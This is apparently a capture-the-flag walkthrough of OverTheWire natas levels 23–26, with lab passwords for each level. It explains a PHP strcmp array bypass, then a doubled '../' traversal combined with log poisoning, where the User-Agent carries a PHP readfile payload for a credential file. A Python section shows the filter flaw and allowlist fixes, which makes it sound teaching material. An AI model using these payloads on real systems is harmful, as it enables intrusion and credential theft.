strstr() searches for one string inside another; if found, it returns that string together with the rest of the haystack, otherwise FALSE. Construct a passwd parameter whose value contains iloveyou and evaluates as greater than 10 in the comparison, and the password for the next level is returned:

Username: natas24 Password: OsRmXFguozKpTZZ5X14zNO43379LZveg


level24

URL:http://natas24.natas.labs.overthewire.org
Username: natas24
Password: OsRmXFguozKpTZZ5X14zNO43379LZveg

Source code:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(!strcmp($_REQUEST["passwd"],"<censored>")){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas25 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>  

strcmp(string1, string2)
strcmp() compares two strings (case-sensitive). It returns:
0 - if the two strings are equal
<0 - if string1 is less than string2
>0 - if string1 is greater than string2

From the code, the submitted passwd must equal the natas25 password. But strcmp() has a flaw, which applies to PHP versions before 5.3: the function expects string arguments, and when an array is passed it raises an error but returns 0, meaning the two values are judged equal.


Username: natas25 Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

level25

URL:http://natas25.natas.labs.overthewire.org
Username: natas25
Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

Source code:

<?php
    // cheers and <3 to malvina
    // - morla

    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
    
    function listFiles($path){
        $listoffiles=array();
        if ($handle = opendir($path))
            while (false !== ($file = readdir($handle)))
                if ($file != "." && $file != "..")
                    $listoffiles[]=$file;
        
        closedir($handle);
        return $listoffiles;
    } 
    
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
?>
<h1>natas25</h1>
<div id="content">
<div align="right">
<form>
<select name='lang' onchange='this.form.submit()'>
<option>language</option>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>
<?php  
    session_start();
    setLanguage();
    
    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

Auditing the code: strstr($filename, "natas_webpass") blocks direct access to the natas_webpass directory, and safeinclude() replaces the traversal sequence "../" with "". But we can bypass that by doubling the sequence. Next, logRequest() stores HTTP_USER_AGENT in the log file, so we can send a GET request with the User-Agent set to <? readfile("/etc/natas_webpass/natas26") ?>, and that PHP code is written into the log file. When we then use directory traversal in the lang= parameter to include the log file, the <? readfile("/etc/natas_webpass/natas26") ?> code in the log is executed and returns the natas26 password oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T.
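Two of the checks above fail for reasons worth seeing concretely: a single str_replace of "../" is not recursive, so a doubled sequence leaves one intact copy behind, and logRequest() stores HTTP_USER_AGENT verbatim. The added example below (not from the page or natas) reproduces the one-pass strip in Python, shows where the resulting path resolves, and puts an allowlist of language names beside it as the fix; a log-hygiene helper for the User-Agent is included with the caveat that it is not what makes log inclusion safe. The language allowlist, the placeholder log filename and the sample User-Agent are constructed.

```python
import posixpath

LANG_DIR = "language"
# Constructed allowlist of language files; the page itself shows only language/en
ALLOWED_LANGS = {"en", "de", "fr"}


def strip_traversal_once(filename):
    # Mirrors safeinclude(): a single, non-recursive str_replace("../", "", ...)
    return filename.replace("../", "")


def strip_traversal_repeat(filename):
    # Repeat until nothing changes: closes the doubled-sequence bypass, though
    # blacklisting remains the wrong tool (absolute paths, encodings, ...)
    prev = None
    while prev != filename:
        prev, filename = filename, filename.replace("../", "")
    return filename


def resolve_page_style(lang):
    # What include() would open after the page's sanitiser, normalised for comparison
    return posixpath.normpath(LANG_DIR + "/" + strip_traversal_once(lang))


def resolve_allowlisted(lang):
    # Fix: the parameter selects a name from a fixed set and never forms a path itself
    if lang not in ALLOWED_LANGS:
        lang = "en"
    return LANG_DIR + "/" + lang


def escapes_dir(path, base=LANG_DIR):
    # True when the normalised path lies outside the language directory
    norm = posixpath.normpath(path)
    return norm != base and not norm.startswith(base + "/")


def sanitise_log_field(value, limit=256):
    # Log hygiene for HTTP_USER_AGENT: drop control characters and cap the length.
    # This does not make including the log file safe; the allowlist above does that.
    cleaned = "".join(ch for ch in value if 32 <= ord(ch) < 127)
    return cleaned[:limit]


def demo():
    # The doubled sequence: one pass removes the inner "../" and leaves a new one behind
    doubled = "....//logs/natas25_PLACEHOLDER.log"
    return {
        "after_single_strip": strip_traversal_once(doubled),
        "escapes_with_page_sanitiser": escapes_dir(resolve_page_style(doubled)),
        "after_repeated_strip": strip_traversal_repeat(doubled),
        "allowlisted": resolve_allowlisted(doubled),
        "allowlisted_en": resolve_allowlisted("en"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Note that the page's `natas_webpass` substring check is of the same kind as the "../" strip: it names one thing to forbid instead of the set of things to allow, which is why the log directory remained reachable.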


level26

URL:http://natas26.natas.labs.overthewire.org
Username: natas26
Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
To be continued.
